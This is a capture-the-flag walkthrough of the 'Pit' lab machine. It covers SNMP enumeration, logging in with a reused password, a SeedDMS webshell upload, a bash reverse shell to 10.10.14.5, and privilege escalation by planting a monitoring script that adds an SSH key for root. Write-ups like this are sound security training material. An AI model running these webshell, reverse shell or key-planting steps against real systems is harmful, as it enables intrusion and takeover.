Pit
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.241 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,9090 10.10.10.241 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
As seen in the nmap report, there is one domain called dms-pit.htb. Let's add it to the /etc/hosts file.
nano /etc/hosts
The website on port 80 shows the default nginx page.
There is a CentOS Linux login page on port 9090, but we don't have credentials.
The dms-pit.htb domain shows a different website with a 403 status code, which means that there is virtual hosting taking place on the server.
One thing that we have missed, is UDP ports. There is one service called SNMP which is exposed through the UDP 161 port.
nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241
-pscan specific port.-sUUDP scan.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into file, in this case the udpScan file.
To enumerate the SNMP service, it is needed to install the MIBS package, and comment the mibs line in the /etc/snmp/snmp.conf file.
apt-get install snmp-mibs-downloader
nano /etc/snmp/snmp.conf
Sometimes, we can get useful information from the SNMP service. In this case, using snmpwalk we'll see the path /var/www/html/seeddms51x/seeddms, and the /usr/bin/monitor binary being executed, which shows the user michelle.
snmpwalk -v 2c -c public 10.10.10.241 1
-vspecifies SNMP version to use.-cset the community string.1set OID.
Exploitation
The http://dms-pit.htb/seeddms51x/seeddms website shows a SeedDMS login page. We could try to log in with the username and password michelle.
These credentials work and we'll see that there are one folder called Docs, and a file called Upgrade Note inside.
Let's search for any common vulnerabilities of SeedDMS.
searchsploit seeddms
Let's check the one called SeedDMS versions < 5.1.11 - Remote Command Execution.
searchsploit -x php/webapps/47022.txt
Apparently, there is a way to get RCE by uploading a webshell. Let's follow the steps. First, go to the Docs folder.
Then, access the Users folder.
Go to the Michelle folder, where we should see the option to add a new document.
Create a simple PHP webshell.
nano pwn.php
Add a new document, and upload the pwn.php webshell.
Once the webshell is uploaded, if we hover over the file, we'll see that it has the documentid 29.
Now, if we access the following URL, we'll be able to run commands on the server, and list the /etc/passwd file.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd
Time to get a shell. First, set a netcat listener on port 4444 using rlwrap.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, send a reverse shell using the webshell we just uploaded.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"
Privilege Escalation
There is one conf directory in /var/www/html/seeddms51x/ with a file called settings.xml.
ls -l /var/www/html/seeddms51x/conf
The settings.xml file contains credentials for a MySQL database.
cat /var/www/html/seeddms51x/conf/settings.xml
We could try to log in as the user michelle, and the password we just found in the login page from https://dms-pit.htb:9090.
The login is successful.
Note that there is one section called Terminal, where there is a webshell as michelle. We could grab the user flag.
Let's investigate what is exactly /usr/bin/monitor.
cat /usr/bin/monitor
It is running every bash script located in /usr/local/monitoring/ which name starts with check and ends with sh. Let's see what privileges we have on that directory.
getfacl /usr/local/monitoring/
We have permission to create new files in that directory. We could create a new script named check_alfa8sa.sh, which will insert our public SSH key into the authorized_keys file. First, grab our public SSH key.
cat ~/.ssh/id_rsa.pub
Then, create the check_alfa8sa.sh inside /usr/local/monitoring/ with the following code.
vi /usr/local/monitoring/check_alfa8sa.sh
Now to trigger the script, we need to run snmpwalk again.
snmpwalk -v 2c -c public 10.10.10.241 1
-vspecifies SNMP version to use.-cset the community string.1set OID.
Now, we should be able to log in via SSH as root without any password. Then, all we have to do is reap the harvest and take the root flag.
ssh root@10.10.10.241
Last updated
Was this helpful?